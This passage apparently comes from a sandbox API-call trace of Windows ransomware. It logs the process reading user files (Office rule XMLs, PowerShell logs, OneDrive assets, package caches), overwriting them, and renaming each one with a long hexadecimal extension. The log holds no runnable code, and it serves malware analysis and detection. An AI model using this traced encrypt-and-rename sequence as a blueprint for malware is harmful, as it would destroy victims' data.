lpOverlapped=0x29fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74) returned 1 [0109.389] NtQueryObject (in: Handle=0x304, ObjectInformationClass=0x1, ObjectInformation=0x6b4860, ObjectInformationLength=0x10004, ReturnLength=0x29fff70 | out: ObjectInformation=0x6b4860, ReturnLength=0x29fff70) returned 0x0 [0109.389] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Package Cache\\{EEA66967-97E2-4561-A999-5C22E3CDE428}v14.25.28508\\packages\\vcRuntimeMinimum_amd64\\cab1.cab", lpString2=".8C2CB4E0B6FEFAC3BB1784C017E1373E18DB85BB9214C700DFC97826C9F4E40E" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Package Cache\\{EEA66967-97E2-4561-A999-5C22E3CDE428}v14.25.28508\\packages\\vcRuntimeMinimum_amd64\\cab1.cab.8C2CB4E0B6FEFAC3BB1784C017E1373E18DB85BB9214C700DFC97826C9F4E40E") returned="\\Device\\HarddiskVolume1\\ProgramData\\Package Cache\\{EEA66967-97E2-4561-A999-5C22E3CDE428}v14.25.28508\\packages\\vcRuntimeMinimum_amd64\\cab1.cab.8C2CB4E0B6FEFAC3BB1784C017E1373E18DB85BB9214C700DFC97826C9F4E40E" [0109.389] GetProcessHeap () returned 0x600000 [0109.389] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x1ae) returned 0x6f2d60 [0109.389] NtSetInformationFile (FileHandle=0x304, IoStatusBlock=0x29fff60, FileInformation=0x6f2d60, Length=0x1ae, FileInformationClass=0xa) returned 0x0 [0109.392] CloseHandle (hObject=0x304) returned 1 [0109.554] GetProcessHeap () returned 0x600000 [0109.554] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6b47b0 | out: hHeap=0x600000) returned 1 [0109.555] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74) returned 1 [0109.752] WriteFile (in: hFile=0x304, lpBuffer=0x315b140, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x0, lpOverlapped=0x313b008 | out: lpBuffer=0x315b140, lpNumberOfBytesWritten=0x0, lpOverlapped=0x313b008) returned 0x0 [0109.755] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74) returned 1 [0109.761] WriteFile (in: hFile=0x314, lpBuffer=0x3183f08*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3163dd0 | out: lpBuffer=0x3183f08*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3163dd0) returned 1 [0109.762] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74) returned 1 [0110.943] ReadFile (in: hFile=0x308, lpBuffer=0x315b140, nNumberOfBytesToRead=0x4600, lpNumberOfBytesRead=0x0, lpOverlapped=0x313b008 | out: lpBuffer=0x315b140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x313b008) returned 1 [0110.987] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74) returned 1 [0111.031] ReadFile (in: hFile=0x31c, lpBuffer=0x315b140, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x313b008 | out: lpBuffer=0x315b140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x313b008) returned 1 [0111.031] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74) returned 1 [0111.032] WriteFile (in: hFile=0x31c, lpBuffer=0x315b140*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x313b008 | out: lpBuffer=0x315b140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x313b008) returned 1 [0111.032] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74) returned 1 [0111.033] NtQueryObject (in: Handle=0x31c, ObjectInformationClass=0x1, ObjectInformation=0x313b0b8, ObjectInformationLength=0x10004, ReturnLength=0x29fff70 | out: ObjectInformation=0x313b0b8, ReturnLength=0x29fff70) returned 0x0 [0111.033] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\CLR_v4.0_32\\UsageLogs\\powershell.exe.log", lpString2=".858648C8C4DB1BF3E6244D3C5620F02560CDC706E5AD53FA4BED6ACC27C6C15F" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\CLR_v4.0_32\\UsageLogs\\powershell.exe.log.858648C8C4DB1BF3E6244D3C5620F02560CDC706E5AD53FA4BED6ACC27C6C15F") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\CLR_v4.0_32\\UsageLogs\\powershell.exe.log.858648C8C4DB1BF3E6244D3C5620F02560CDC706E5AD53FA4BED6ACC27C6C15F" [0111.033] GetProcessHeap () returned 0x600000 [0111.033] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x16a) returned 0x6f3248 [0111.033] NtSetInformationFile (FileHandle=0x31c, IoStatusBlock=0x29fff60, FileInformation=0x6f3248, Length=0x16a, FileInformationClass=0xa) returned 0x0 [0111.037] CloseHandle (hObject=0x31c) returned 1 [0111.038] GetProcessHeap () returned 0x600000 [0111.038] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0111.039] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74) returned 1 [0111.113] ReadFile (in: hFile=0x32c, lpBuffer=0x30c0180, nNumberOfBytesToRead=0x1800, lpNumberOfBytesRead=0x0, lpOverlapped=0x30a0048 | out: lpBuffer=0x30c0180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30a0048) returned 1 [0111.124] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74) returned 1 [0111.148] ReadFile (in: hFile=0x31c, lpBuffer=0x30c0180, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x0, lpOverlapped=0x30a0048 | out: lpBuffer=0x30c0180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30a0048) returned 1 [0111.154] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74) returned 1 [0111.211] ReadFile (in: hFile=0x32c, lpBuffer=0x30c0180, nNumberOfBytesToRead=0x3e00, lpNumberOfBytesRead=0x0, lpOverlapped=0x30a0048 | out: lpBuffer=0x30c0180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30a0048) returned 1 [0111.213] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74) returned 1 [0111.222] NtQueryObject (in: Handle=0x32c, ObjectInformationClass=0x1, ObjectInformation=0x30a00f8, ObjectInformationLength=0x10004, ReturnLength=0x29fff70 | out: ObjectInformation=0x30a00f8, ReturnLength=0x29fff70) returned 0x0 [0111.222] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\VersionManager\\versionlist.xml", lpString2=".162099C1F493AA7E611A6D6AE7C1E8ED2ADDBA5492506AB7F40144044F156E3D" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\VersionManager\\versionlist.xml.162099C1F493AA7E611A6D6AE7C1E8ED2ADDBA5492506AB7F40144044F156E3D") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\VersionManager\\versionlist.xml.162099C1F493AA7E611A6D6AE7C1E8ED2ADDBA5492506AB7F40144044F156E3D" [0111.222] GetProcessHeap () returned 0x600000 [0111.222] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x17a) returned 0x6edb80 [0111.222] NtSetInformationFile (FileHandle=0x32c, IoStatusBlock=0x29fff60, FileInformation=0x6edb80, Length=0x17a, FileInformationClass=0xa) returned 0x0 [0111.227] CloseHandle (hObject=0x32c) returned 1 [0111.230] GetProcessHeap () returned 0x600000 [0111.230] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30a0048 | out: hHeap=0x600000) returned 1 [0111.231] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74) returned 1 [0111.289] ReadFile (in: hFile=0x310, lpBuffer=0x30c0180, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x30a0048 | out: lpBuffer=0x30c0180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30a0048) returned 1 [0111.289] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74) returned 1 [0111.356] WriteFile (in: hFile=0x310, lpBuffer=0x30c0180*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30a0048 | out: lpBuffer=0x30c0180*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30a0048) returned 1 [0111.367] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74) returned 1 [0111.368] NtQueryObject (in: Handle=0x310, ObjectInformationClass=0x1, ObjectInformation=0x30a00f8, ObjectInformationLength=0x10004, ReturnLength=0x29fff70 | out: ObjectInformation=0x30a00f8, ReturnLength=0x29fff70) returned 0x0 [0111.368] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\excel.exe_Rules.xml", lpString2=".EA75FA454E9FD85C909C1A4202FFE983ACD601AA1E8A9DC03557280ECC087E24" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\excel.exe_Rules.xml.EA75FA454E9FD85C909C1A4202FFE983ACD601AA1E8A9DC03557280ECC087E24") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\excel.exe_Rules.xml.EA75FA454E9FD85C909C1A4202FFE983ACD601AA1E8A9DC03557280ECC087E24" [0111.368] GetProcessHeap () returned 0x600000 [0111.368] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x158) returned 0x311b828 [0111.368] NtSetInformationFile (FileHandle=0x310, IoStatusBlock=0x29fff60, FileInformation=0x311b828, Length=0x158, FileInformationClass=0xa) returned 0x0 [0111.373] CloseHandle (hObject=0x310) returned 1 [0111.377] GetProcessHeap () returned 0x600000 [0111.377] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30a0048 | out: hHeap=0x600000) returned 1 [0111.378] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74) returned 1 [0111.427] ReadFile (in: hFile=0x334, lpBuffer=0x31130f8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x30f2fc0 | out: lpBuffer=0x31130f8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30f2fc0) returned 1 [0111.427] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74) returned 1 [0111.428] WriteFile (in: hFile=0x334, lpBuffer=0x31130f8, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30f2fc0 | out: lpBuffer=0x31130f8, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30f2fc0) returned 0x0 [0111.428] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74) returned 1 [0111.429] NtQueryObject (in: Handle=0x334, ObjectInformationClass=0x1, ObjectInformation=0x30f3070, ObjectInformationLength=0x10004, ReturnLength=0x29fff70 | out: ObjectInformation=0x30f3070, ReturnLength=0x29fff70) returned 0x0 [0111.430] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\winword.exe_Rules.xml", lpString2=".F00520072BE99102D8075D7A127E439599CC485247AE3EC11E890EF8B6702120" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\winword.exe_Rules.xml.F00520072BE99102D8075D7A127E439599CC485247AE3EC11E890EF8B6702120") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\winword.exe_Rules.xml.F00520072BE99102D8075D7A127E439599CC485247AE3EC11E890EF8B6702120" [0111.430] GetProcessHeap () returned 0x600000 [0111.430] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x15c) returned 0x311b988 [0111.430] NtSetInformationFile (FileHandle=0x334, IoStatusBlock=0x29fff60, FileInformation=0x311b988, Length=0x15c, FileInformationClass=0xa) returned 0x0 [0111.430] CloseHandle (hObject=0x334) returned 1 [0111.434] GetProcessHeap () returned 0x600000 [0111.435] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0111.436] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74) returned 1 [0111.447] ReadFile (in: hFile=0x334, lpBuffer=0x31130f8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x0, lpOverlapped=0x30f2fc0 | out: lpBuffer=0x31130f8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30f2fc0) returned 1 [0111.447] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74) returned 1 [0111.455] NtQueryObject (in: Handle=0x334, ObjectInformationClass=0x1, ObjectInformation=0x30f3070, ObjectInformationLength=0x10004, ReturnLength=0x29fff70 | out: ObjectInformation=0x30f3070, ReturnLength=0x29fff70) returned 0x0 [0111.455] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\OTele\\{09178D66-BA92-4DE3-B96C-2B24754031BF} (0) - 1840 - msaccess.exe - OTeleMediumCost.dat", lpString2=".E543329E8E30FCBFEB127B29F50E6A0007349F3B67BDB4EEBFDC24E11B628101" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\OTele\\{09178D66-BA92-4DE3-B96C-2B24754031BF} (0) - 1840 - msaccess.exe - OTeleMediumCost.dat.E543329E8E30FCBFEB127B29F50E6A0007349F3B67BDB4EEBFDC24E11B628101") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\OTele\\{09178D66-BA92-4DE3-B96C-2B24754031BF} (0) - 1840 - msaccess.exe - OTeleMediumCost.dat.E543329E8E30FCBFEB127B29F50E6A0007349F3B67BDB4EEBFDC24E11B628101" [0111.455] GetProcessHeap () returned 0x600000 [0111.455] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x1e0) returned 0x311baf0 [0111.455] NtSetInformationFile (FileHandle=0x334, IoStatusBlock=0x29fff60, FileInformation=0x311baf0, Length=0x1e0, FileInformationClass=0xa) returned 0x0 [0111.462] CloseHandle (hObject=0x334) returned 1 [0111.464] GetProcessHeap () returned 0x600000 [0111.464] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0111.464] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74) returned 1 [0111.472] ReadFile (in: hFile=0x334, lpBuffer=0x31130f8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x0, lpOverlapped=0x30f2fc0 | out: lpBuffer=0x31130f8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30f2fc0) returned 1 [0111.473] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74) returned 1 [0111.490] NtQueryObject (in: Handle=0x330, ObjectInformationClass=0x1, ObjectInformation=0x30a00f8, ObjectInformationLength=0x10004, ReturnLength=0x29fff70 | out: ObjectInformation=0x30a00f8, ReturnLength=0x29fff70) returned 0x0 [0111.490] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\OTele\\{4D44C03C-CEAC-41B9-A9F9-31BD04BE84B8} (0) - 540 - powerpnt.exe - OTeleMediumCost.dat", lpString2=".3EFD50AAB9BD29650E2B4B43F843620348EDD4EA65FCF4CC19068FF0633DE774" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\OTele\\{4D44C03C-CEAC-41B9-A9F9-31BD04BE84B8} (0) - 540 - powerpnt.exe - OTeleMediumCost.dat.3EFD50AAB9BD29650E2B4B43F843620348EDD4EA65FCF4CC19068FF0633DE774") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\OTele\\{4D44C03C-CEAC-41B9-A9F9-31BD04BE84B8} (0) - 540 - powerpnt.exe - OTeleMediumCost.dat.3EFD50AAB9BD29650E2B4B43F843620348EDD4EA65FCF4CC19068FF0633DE774" [0111.490] GetProcessHeap () returned 0x600000 [0111.490] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x1de) returned 0x6f3880 [0111.490] NtSetInformationFile (FileHandle=0x330, IoStatusBlock=0x29fff60, FileInformation=0x6f3880, Length=0x1de, FileInformationClass=0xa) returned 0x0 [0111.491] CloseHandle (hObject=0x330) returned 1 [0111.492] GetProcessHeap () returned 0x600000 [0111.492] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30a0048 | out: hHeap=0x600000) returned 1 [0111.494] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74) returned 1 [0111.501] ReadFile (in: hFile=0x330, lpBuffer=0x30c0180, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x30a0048 | out: lpBuffer=0x30c0180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30a0048) returned 1 [0111.501] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74) returned 1 [0111.502] NtQueryObject (in: Handle=0x330, ObjectInformationClass=0x1, ObjectInformation=0x30a00f8, ObjectInformationLength=0x10004, ReturnLength=0x29fff70 | out: ObjectInformation=0x30a00f8, ReturnLength=0x29fff70) returned 0x0 [0111.503] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\AutoPlayOptIn.gif", lpString2=".19CBB8569E4470519CC469A0C7E1C838650BD5D0C89A3FDC640A062CE8D3BA2D" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\AutoPlayOptIn.gif.19CBB8569E4470519CC469A0C7E1C838650BD5D0C89A3FDC640A062CE8D3BA2D") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\AutoPlayOptIn.gif.19CBB8569E4470519CC469A0C7E1C838650BD5D0C89A3FDC640A062CE8D3BA2D" [0111.503] GetProcessHeap () returned 0x600000 [0111.503] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x16c) returned 0x6f3a68 [0111.503] NtSetInformationFile (FileHandle=0x330, IoStatusBlock=0x29fff60, FileInformation=0x6f3a68, Length=0x16c, FileInformationClass=0xa) returned 0x0 [0111.503] CloseHandle (hObject=0x330) returned 1 [0111.516] GetProcessHeap () returned 0x600000 [0111.516] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30a0048 | out: hHeap=0x600000) returned 1 [0111.517] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74) returned 1 [0111.521] ReadFile (in: hFile=0x330, lpBuffer=0x30c0180, nNumberOfBytesToRead=0x2600, lpNumberOfBytesRead=0x0, lpOverlapped=0x30a0048 | out: lpBuffer=0x30c0180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30a0048) returned 1 [0111.521] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74) returned 1 [0111.522] NtQueryObject (in: Handle=0x330, ObjectInformationClass=0x1, ObjectInformation=0x30a00f8, ObjectInformationLength=0x10004, ReturnLength=0x29fff70 | out: ObjectInformation=0x30a00f8, ReturnLength=0x29fff70) returned 0x0 [0111.523] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\AutoPlayOptIn.png", lpString2=".AE1F0887EF2A1680493247997EB1F49FB58E53DD5E2B35D389C8C49DE3BD072B" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\AutoPlayOptIn.png.AE1F0887EF2A1680493247997EB1F49FB58E53DD5E2B35D389C8C49DE3BD072B") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\AutoPlayOptIn.png.AE1F0887EF2A1680493247997EB1F49FB58E53DD5E2B35D389C8C49DE3BD072B" [0111.523] GetProcessHeap () returned 0x600000 [0111.523] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x16c) returned 0x6f3be0 [0111.523] NtSetInformationFile (FileHandle=0x330, IoStatusBlock=0x29fff60, FileInformation=0x6f3be0, Length=0x16c, FileInformationClass=0xa) returned 0x0 [0111.524] CloseHandle (hObject=0x330) returned 1 [0111.525] GetProcessHeap () returned 0x600000 [0111.525] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30a0048 | out: hHeap=0x600000) returned 1 [0111.526] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74) returned 1 [0111.531] ReadFile (in: hFile=0x330, lpBuffer=0x30c0180, nNumberOfBytesToRead=0x1600, lpNumberOfBytesRead=0x0, lpOverlapped=0x30a0048 | out: lpBuffer=0x30c0180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30a0048) returned 1 [0111.531] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74) returned 1 [0111.532] WriteFile (in: hFile=0x330, lpBuffer=0x30c0180*, nNumberOfBytesToWrite=0x1600, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30a0048 | out: lpBuffer=0x30c0180*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30a0048) returned 1 [0111.532] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x29fff7c, lpCompletionKey=0x29fff78, lpOverlapped=0x29fff74) returned 1 [0111.533] NtQueryObject (in: Handle=0x330, ObjectInformationClass=0x1, ObjectInformation=0x30a00f8, ObjectInformationLength=0x10004, ReturnLength=0x29fff70 | out: ObjectInformation=0x30a00f8, ReturnLength=0x29fff70) returned 0x0 [0111.533] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\CollectOneDriveLogs.bat", lpString2=".9540D5BD726EED8BD33A6F04EECBF9DE248D9584AC335BA23D05AA8F35424821" | out: 